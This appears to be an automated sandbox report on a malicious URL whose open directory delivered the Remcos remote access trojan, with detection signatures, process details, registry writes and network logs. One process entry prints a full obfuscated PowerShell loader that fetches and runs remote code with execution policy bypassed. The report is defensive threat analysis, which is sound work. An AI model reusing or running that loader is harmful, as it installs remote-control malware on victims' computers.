URL:

http://asegurar4octubre.duckdns.org/

Full analysis: https://app.any.run/tasks/7168f369-26d3-4d24-90a6-5ff2915559d2
Verdict: Malicious activity
Threats:

Remote access trojans (RATs) are a type of malware that enables attackers to establish complete to partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common features of RATs include access to the users’ data, webcam, and keystrokes. This malware is often distributed through phishing emails and links.

Malware Trends Tracker     >>>
Analysis date: February 18, 2025, 22:39:08
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
opendir
pastebin
remcos
rat
remote
Indicators:
MD5:

B0D46E6BAC9BA141B02FA729CBCA9FB2

SHA1:

9AF35A62922839FE032297840E29835E514CC993

SHA256:

6A274E5CD585E56E7367001314EBAE6C1CD3C3F9E470AD5F1AAF108E618A5358

SSDEEP:

3:N1KfiCEwQ1IWin:CjEj1IWi

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 3436)
      • powershell.exe (PID: 5916)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 5916)
      • powershell.exe (PID: 3420)

    • Changes powershell execution policy (Bypass)

      • powershell.exe (PID: 5916)
      • powershell.exe (PID: 3436)

    • REMCOS mutex has been found

      • MSBuild.exe (PID: 5244)

    • REMCOS has been detected (SURICATA)

      • MSBuild.exe (PID: 5244)

    • REMCOS has been detected

      • MSBuild.exe (PID: 5244)
      • MSBuild.exe (PID: 5244)

    • REMCOS has been detected (YARA)

      • MSBuild.exe (PID: 5244)

  • SUSPICIOUS

    • Block-list domains

      • msedge.exe (PID: 7108)

    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 3436)
      • powershell.exe (PID: 5916)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 3436)
      • powershell.exe (PID: 3420)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 4992)

    • Probably obfuscated PowerShell command line is found

      • wscript.exe (PID: 4992)
      • powershell.exe (PID: 3436)

    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 4992)
      • powershell.exe (PID: 3436)
      • powershell.exe (PID: 5916)

    • Gets content of a file (POWERSHELL)

      • powershell.exe (PID: 3436)

    • Application launched itself

      • powershell.exe (PID: 3436)
      • powershell.exe (PID: 5916)

    • The process executes Powershell scripts

      • powershell.exe (PID: 3436)
      • powershell.exe (PID: 5916)

    • Probably download files using WebClient

      • powershell.exe (PID: 3436)

    • Potential Corporate Privacy Violation

      • powershell.exe (PID: 5916)
      • powershell.exe (PID: 3420)

    • Contacting a server suspected of hosting an CnC

      • MSBuild.exe (PID: 5244)

    • Connects to unusual port

      • MSBuild.exe (PID: 5244)

    • Reads security settings of Internet Explorer

      • MSBuild.exe (PID: 5244)

    • There is functionality for taking screenshot (YARA)

      • MSBuild.exe (PID: 5244)

  • INFO

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 3436)
      • powershell.exe (PID: 3420)

    • Manual execution by a user

      • wscript.exe (PID: 4992)
      • notepad++.exe (PID: 7668)
      • notepad++.exe (PID: 5936)

    • Checks supported languages

      • identity_helper.exe (PID: 8084)
      • MSBuild.exe (PID: 5244)

    • Reads the computer name

      • identity_helper.exe (PID: 8084)
      • MSBuild.exe (PID: 5244)

    • Reads Environment values

      • identity_helper.exe (PID: 8084)

    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 3436)

    • Application launched itself

      • msedge.exe (PID: 6864)

    • Checks proxy server information

      • powershell.exe (PID: 5916)
      • powershell.exe (PID: 3420)
      • MSBuild.exe (PID: 5244)

    • Disables trace logs

      • powershell.exe (PID: 5916)
      • powershell.exe (PID: 3420)

    • Creates files or folders in the user directory

      • MSBuild.exe (PID: 5244)

    • Reads the machine GUID from the registry

      • MSBuild.exe (PID: 5244)

    • Creates files in the program directory

      • MSBuild.exe (PID: 5244)

    • The sample compiled with english language support

      • msedge.exe (PID: 7624)

    • Executable content was dropped or overwritten

      • msedge.exe (PID: 7624)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
177
Monitored processes
51
Malicious processes
6
Suspicious processes
1

Behavior graph

Click at the process to see the details
start iexplore.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe svchost.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs identity_helper.exe no specs identity_helper.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs rundll32.exe no specs notepad++.exe msedge.exe no specs msedge.exe no specs wscript.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe powershell.exe msbuild.exe no specs #REMCOS msbuild.exe notepad++.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
644"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=5812 --field-trial-handle=2420,i,3145728529689868577,8904705129187573045,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2192C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2676"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=6368 --field-trial-handle=2420,i,3145728529689868577,8904705129187573045,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2904"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=4940 --field-trial-handle=2420,i,3145728529689868577,8904705129187573045,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3420"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\admin\AppData\Local\Temp\dll03.ps1C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
3436"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwBw★GE★cwB0★GU★YgBp★G4★LgBj★G8★bQ★v★HI★YQB3★C8★c★B6★Fg★RwBr★GE★eQBV★Cc★I★★7★CQ★SQBl★H★★RwBR★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★x★C4★d★B4★HQ★Jw★p★Ds★J★B3★GU★YgBD★Gw★aQBl★G4★d★★g★D0★I★BO★GU★dw★t★E8★YgBq★GU★YwB0★C★★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★Fc★ZQBi★EM★b★Bp★GU★bgB0★C★★Ow★k★FI★VgBV★Fg★dg★g★D0★I★★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C4★R★Bv★Hc★bgBs★G8★YQBk★FM★d★By★Gk★bgBn★Cg★I★★k★Ho★RgBL★GE★QQ★g★Ck★I★★7★CQ★UgBW★FU★W★B2★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BJ★GU★c★BH★FE★I★★t★EU★bgBj★G8★Z★Bp★G4★Zw★g★Cc★VQBU★EY★O★★n★C★★LQBm★G8★cgBj★GU★I★★7★CQ★UwBU★GY★RwBs★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★y★C4★d★B4★HQ★Jw★p★C★★Ow★k★F★★a★By★Gw★Tg★g★D0★I★BO★GU★dw★t★E8★YgBq★GU★YwB0★C★★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★Fc★ZQBi★EM★b★Bp★GU★bgB0★C★★Ow★k★F★★a★By★Gw★Tg★u★EU★bgBj★G8★Z★Bp★G4★Zw★g★D0★I★Bb★FM★eQBz★HQ★ZQBt★C4★V★Bl★Hg★d★★u★EU★bgBj★G8★Z★Bp★G4★ZwBd★Do★OgBV★FQ★Rg★4★C★★Ow★k★EQ★S★B6★FU★QQ★g★C★★PQ★g★Cg★I★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★Ck★I★★7★CQ★dQBU★Gw★S★B6★C★★PQ★g★CQ★U★Bo★HI★b★BO★C4★R★Bv★Hc★bgBs★G8★YQBk★FM★d★By★Gk★bgBn★Cg★I★★k★EQ★S★B6★FU★QQ★g★Ck★I★★7★CQ★dQBU★Gw★S★B6★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BT★FQ★ZgBH★Gw★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BN★E8★R★BS★Gc★I★★9★C★★I★★n★CQ★cgB5★GE★ZQBH★C★★PQ★g★Cg★RwBl★HQ★LQBD★G8★bgB0★GU★bgB0★C★★LQBQ★GE★d★Bo★C★★Jw★n★Cc★I★★r★C★★J★BT★FQ★ZgBH★Gw★I★★r★C★★Jw★n★Cc★I★★t★EU★bgBj★G8★Z★Bp★G4★Zw★g★FU★V★BG★Dg★KQ★7★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBb★EI★eQB0★GU★WwBd★F0★I★★k★EY★eQBm★GQ★eg★g★D0★I★Bb★HM★eQBz★HQ★ZQBt★C4★QwBv★G4★dgBl★HI★d★Bd★Do★OgBG★HI★bwBt★EI★YQBz★GU★Ng★0★FM★d★By★Gk★bgBn★Cg★I★★k★HI★eQBh★GU★Rw★u★HI★ZQBw★Gw★YQBj★GU★K★★n★Cc★J★★k★CQ★J★★n★Cc★L★★n★Cc★QQ★n★Cc★KQ★g★Ck★I★★7★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBb★FM★eQBz★HQ★ZQBt★C4★QQBw★H★★R★Bv★G0★YQBp★G4★XQ★6★Cc★I★★r★C★★Jw★6★EM★dQBy★HI★ZQBu★HQ★R★Bv★G0★YQBp★G4★LgBM★G8★YQBk★Cg★I★★k★EY★eQBm★GQ★eg★g★Ck★Lg★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★RwBl★HQ★V★B5★H★★ZQ★o★C★★Jw★n★FQ★ZQBo★HU★b★Bj★Gg★ZQBz★Fg★e★BY★Hg★e★★u★EM★b★Bh★HM★cw★x★Cc★Jw★g★Ck★LgBH★GU★d★BN★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBl★HQ★a★Bv★GQ★K★★g★Cc★JwBN★HM★cQBC★Ek★YgBZ★Cc★Jw★g★Ck★LgBJ★G4★dgBv★Gs★ZQ★o★C★★J★Bu★HU★b★Bs★C★★L★★g★Fs★bwBi★Go★ZQBj★HQ★WwBd★F0★I★★o★C★★Jw★n★HQ★e★B0★C4★NQ★y★D★★MgBm★GY★ZQB0★HM★bwBz★C8★cwBk★GE★bwBs★G4★dwBv★GQ★LwBy★GU★bgBl★HQ★cwBv★HM★Mw★y★DE★Lw★x★GU★cgBy★G8★d★Bj★GU★a★★v★Gc★cgBv★C4★d★Bl★Gs★YwB1★GI★d★Bp★GI★Lw★v★Do★cwBw★HQ★d★Bo★Cc★Jw★g★Cw★I★★n★Cc★JQBK★Gs★UQBh★HM★R★Bm★Gc★cgBU★Gc★JQ★n★Cc★I★★s★C★★Jw★n★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★Xw★t★C0★LQ★t★C0★LQ★t★Cc★Jw★s★C★★Jw★n★D★★Jw★n★Cw★I★★n★Cc★MQ★n★Cc★L★★g★Cc★JwBS★G8★Z★Bh★Cc★Jw★g★C★★KQ★g★Ck★I★★7★Cc★I★★7★CQ★VgBC★Fc★VwB6★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★z★C4★c★Bz★DE★Jw★g★Ck★I★★7★CQ★TQBP★EQ★UgBn★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BW★EI★VwBX★Ho★I★★g★C0★ZgBv★HI★YwBl★C★★OwBw★G8★dwBl★HI★cwBo★GU★b★Bs★C★★LQBF★Hg★ZQBj★HU★d★Bp★G8★bgBQ★G8★b★Bp★GM★eQ★g★EI★eQBw★GE★cwBz★C★★LQBG★Gk★b★Bl★C★★J★BW★EI★VwBX★Ho★I★★7★★==';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\admin\Downloads\sostener2.vbs');powershell $Yolopolhggobek;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3464"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=4176 --field-trial-handle=2420,i,3145728529689868577,8904705129187573045,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3876"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=6684 --field-trial-handle=2420,i,3145728529689868577,8904705129187573045,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4008"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=796 --field-trial-handle=2420,i,3145728529689868577,8904705129187573045,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4504"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=4232 --field-trial-handle=2420,i,3145728529689868577,8904705129187573045,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
23 935
Read events
23 872
Write events
61
Delete events
2

Modification events

(PID) Process:(6736) iexplore.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(6736) iexplore.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(6736) iexplore.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(6736) iexplore.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main
Operation:writeName:CompatibilityFlags
Value:
0
(PID) Process:(6736) iexplore.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
Operation:writeName:SecuritySafe
Value:
1
(PID) Process:(6736) iexplore.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main
Operation:writeName:DisableFirstRunCustomize
Value:
1
(PID) Process:(6864) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\EdgeUpdate\Clients\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}\Commands\on-logon-autolaunch
Operation:writeName:Enabled
Value:
0
(PID) Process:(6864) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:MicrosoftEdgeAutoLaunch_29EBC4579851B72EE312C449CF839B1A
Value:
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
(PID) Process:(6864) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\Profiles
Operation:writeName:EnhancedLinkOpeningDefault
Value:
Default
(PID) Process:(6864) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowProperties\262842
Operation:writeName:WindowTabManagerFileMappingId
Value:
{326DD1AD-5BBE-41B3-A3F7-751EC3FB3C23}
Executable files
11
Suspicious files
208
Text files
63
Unknown types
0

Dropped files

PID
Process
Filename
Type
6864msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\parcel_tracking_db\LOG.old~RF135caa.TMP
MD5:
SHA256:
6864msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\parcel_tracking_db\LOG.old
MD5:
SHA256:
6864msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\PersistentOriginTrials\LOG.old~RF135cc9.TMP
MD5:
SHA256:
6864msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\discounts_db\LOG.old~RF135cc9.TMP
MD5:
SHA256:
6864msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\discounts_db\LOG.old
MD5:
SHA256:
6864msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\PersistentOriginTrials\LOG.old
MD5:
SHA256:
6864msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey\LOG.old~RF135ce8.TMP
MD5:
SHA256:
6864msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey\LOG.old
MD5:
SHA256:
6864msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db\LOG.old~RF135ce8.TMP
MD5:
SHA256:
6864msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db\LOG.old
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
62
TCP/UDP connections
78
DNS requests
78
Threats
41

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1684
svchost.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
95.101.54.224:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
1176
svchost.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
GET
200
46.246.80.11:80
http://asegurar4octubre.duckdns.org/
unknown
unknown
GET
200
46.246.80.11:80
http://asegurar4octubre.duckdns.org/icons/blank.gif
unknown
unknown
GET
200
46.246.80.11:80
http://asegurar4octubre.duckdns.org/icons/unknown.gif
unknown
unknown
GET
404
46.246.80.11:80
http://asegurar4octubre.duckdns.org/favicon.ico
unknown
unknown
GET
200
46.246.80.11:80
http://asegurar4octubre.duckdns.org/icons/blank.gif
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4712
MoUsoCoreWorker.exe
95.101.54.224:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
4712
MoUsoCoreWorker.exe
2.23.246.101:80
www.microsoft.com
Ooredoo Q.S.C.
QA
whitelisted
1684
svchost.exe
2.23.246.101:80
www.microsoft.com
Ooredoo Q.S.C.
QA
whitelisted
4
System
192.168.100.255:138
whitelisted
5064
SearchApp.exe
184.86.251.22:443
www.bing.com
Akamai International B.V.
DE
whitelisted
184.30.131.245:80
ocsp.digicert.com
AKAMAI-AS
US
whitelisted
1176
svchost.exe
40.126.31.131:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1176
svchost.exe
184.30.131.245:80
ocsp.digicert.com
AKAMAI-AS
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
  • 4.231.128.59
whitelisted
crl.microsoft.com
  • 95.101.54.224
  • 95.101.54.240
whitelisted
www.microsoft.com
  • 2.23.246.101
  • 184.30.21.171
whitelisted
google.com
  • 142.250.185.78
whitelisted
www.bing.com
  • 184.86.251.22
  • 184.86.251.7
  • 184.86.251.9
  • 184.86.251.27
